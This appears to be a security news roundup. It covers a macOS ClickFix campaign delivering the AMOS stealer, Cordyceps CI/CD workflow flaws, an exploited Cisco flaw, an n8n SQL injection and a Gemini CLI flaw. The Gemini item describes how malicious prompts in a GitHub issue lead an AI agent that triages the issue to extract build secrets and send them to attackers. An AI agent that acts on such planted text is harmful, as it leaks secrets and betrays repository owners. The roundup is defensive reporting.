Trending Topics

New macOS ClickFix Campaign Silently Mounts DMGs To Deliver AMOS Infostealer

A new macOS ClickFix campaign is abusing Terminal commands to silently download and mount malicious disk images, delivering the Atomic macOS Stealer without the visual cues users typically rely on to spot trouble. Attackers start with a fake CAPTCHA page claiming users must verify themselves to continue, then instruct them to open Terminal and paste a single command.

Once executed, that command uses curl with quiet flags to pull a DMG from an attacker-controlled server, saves it to the /tmp directory with a random filename, then calls macOS hdiutil with the -nobrowse option so the disk image mounts without appearing in Finder or on the desktop. The script then locates an embedded app bundle on the mounted image and launches it - all without obvious user interface prompts, making this flow particularly dangerous for non-technical Mac users.

The payload is AMOS, an infostealer tailored for macOS that targets browser credentials, cryptocurrency wallets, Keychain data, messaging apps, and local documents. Recent research has also noted its ability to swap legitimate crypto applications with trojanized versions to hijack transactions.

This campaign reflects a broader evolution of ClickFix, in which social engineering tricks convince victims to run commands themselves - neatly sidestepping traditional exploit-based delivery and certain built-in protections.

For defenders, the key takeaways are straightforward: educate users never to paste commands from untrusted web pages, tighten detection for curl and hdiutil activity originating from user-initiated shells, and monitor for connections to known malicious infrastructure including svs-verificationdate[.]beer and 196.251.107[.]171.

Cordyceps CI/CD Flaws Expose Millions Of Repos To Silent Hijacking

A new class of CI/CD vulnerabilities dubbed Cordyceps is exposing millions of open source repositories to hijacking by unauthenticated attackers who can take over build pipelines and developer workflows at scale. According to research from Novee, insecure patterns generated and copied by agentic coding tools have propagated flawed GitHub Actions workflows across thousands of projects, turning YAML configuration into a critical attack surface.

These workflows frequently chain low-privilege triggers - such as untrusted pull requests or issue comments - into high-privilege jobs that run shell commands, authenticate to cloud providers, handle signing keys, and publish releases. Because .yml files are typically treated as simple configuration and largely ignored by traditional scanners, they can hide command injection, artifact poisoning, and privilege escalation paths in plain sight, exploitable by any attacker with a free account and no special organization role.

Novee's scan identified 654 repositories with Cordyceps patterns and confirmed more than 300 as fully exploitable, including widely used tooling from Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation. The downstream consequences include supply chain compromise via malicious packages pushed to npm, PyPI, Crates.io, Docker, and GHCR registries; tampered releases; stolen cloud credentials for AWS, GCP, and Netlify; compromised self-hosted runners; and bot impersonation within project workflows.

For security teams, the immediate priority is to treat CI/CD YAML as security-critical code. That means auditing Actions workflows for unsafe patterns, locking down who can trigger high-privilege jobs, and adding monitoring around suspicious pull requests or comments that could serve as the first step in a Cordyceps-style pipeline hijack.

Update: Cisco Unified CM SSRF Flaw CVE-2026-20230 Now Actively Exploited

Cisco's critical Unified Communications Manager vulnerability CVE-2026-20230 has moved from theoretical risk to active exploitation, with attackers now targeting voice and collaboration infrastructure in real-world attacks. The flaw affects Cisco Unified Communications Manager and Unified CM Session Management Edition, stemming from improper input validation in HTTP requests handled by the WebDialer service. By sending crafted requests, an unauthenticated remote attacker can abuse server-side request forgery to force the system to write arbitrary files to the underlying operating system - creating a foothold for privilege escalation to root.

Cisco originally rated the CVSS score at 8.6 but classified the advisory as Critical because successful exploitation ultimately delivers full root-level control over a core communications platform widely used for enterprise telephony and call routing. Exploitation requires WebDialer to be enabled, which is off by default, but many deployments have turned it on to support click-to-call features - leaving them exposed.

Proof-of-concept exploit code has already been released, and recent reporting confirms that threat actors have begun weaponizing it against unpatched systems. Organizations running version 14 should urgently apply 14SU6. Version 15 customers must deploy Cisco's interim COP patch or disable WebDialer until the full 15SU5 service update arrives. Any delay leaves a path open for a single HTTP request to compromise the root of a mission-critical communications stack.

SQL Injection in n8n Gives Workflow Users Direct Access to Production Databases

CVE-2026-56351 is a SQL injection vulnerability in n8n versions prior to 2.4.0 that allows any authenticated user with workflow creation privileges to execute unauthorized commands against connected MySQL, PostgreSQL, and Microsoft SQL databases. The platform fails to sanitize table and column names entered during workflow configuration, allowing an attacker to embed malicious database commands in what appears to be a normal input field. The database receives it, treats it as a legitimate instruction, and executes it.

No administrative access is required. A standard workflow account is enough to read sensitive records, alter data, or delete entire databases that n8n is authorized to touch. Any instance connected to a PostgreSQL or SQL Server environment holds persistent credentials for that database and runs with whatever permissions were configured for the integration - which in many deployments is broader than it should be.

This is the second significant vulnerability to affect n8n in under a year. CVE-2025-68613, disclosed last year, exposed over 103,000 publicly accessible n8n instances to full server takeover. No active exploits or APT activity have been linked to CVE-2026-56351 yet, but SQL injection techniques are freely documented, require minimal authentication, and have widely available tooling to automate attacks. The window between disclosure and exploitation tends to be short.

Updating to n8n 2.4.0 or later closes the vulnerability. While that update is being staged, organizations should immediately audit who holds workflow creation privileges and revoke access for any account that does not require it. Any n8n instance directly accessible from the internet should be treated as a priority remediation target. A pending patch is not a reason to delay tightening access controls.

Google Gemini CLI Flaw Gave Attackers a Path From a GitHub Issue to Full Repository Control

CVE-2026-12537 is an improper input validation vulnerability in Google Gemini CLI versions prior to 0.39.1. The flaw allowed an unprivileged external attacker to force malicious content to load as the Gemini configuration, triggering command execution directly on the host system before the agent's sandbox even initialized.

The mechanism is a maliciously crafted .gemini/.env file whose embedded commands the CLI accepts without question, treating attacker-controlled content as trusted configuration. That content loads silently as an agent configuration and executes on the host before any defensive layer is triggered. Despite an initially unassigned CVSS score, Google's internal assessment rated the vulnerability a 10.0 - reflecting low complexity, minimal privilege requirements, and no user interaction needed to exploit it.

In practice, an attacker could exploit this by creating a public GitHub issue with malicious prompts embedded in the text. Any AI agent automatically triaging that issue would load the attacker's content, extract internal secrets from the build environment, and send them to attacker-controlled infrastructure. Pillar Security researcher Dan Lisichkin, who co-discovered the vulnerability, described this as the "lethal trifecta": access to private data, exposure to untrusted content, and the ability to communicate externally - all present in the same attack path.

Google has published a security advisory patching both the run-gemini-cli action in version 0.1.22 and Gemini CLI in versions 0.39.1 and 0.40.0-preview.3. The fix enforces a tool allowlist and adds shell command sanitization, with updated best practices and example workflow templates.

Beyond patching, developers should set persist-credentials: false in their GitHub settings to keep tokens off disk, removing the credential storage that enables post-exploitation pivoting.

An AI agent running in a build environment with access to secrets, repositories, and external communication is not just an assistant. In the wrong configuration, it is an attack surface with administrative reach.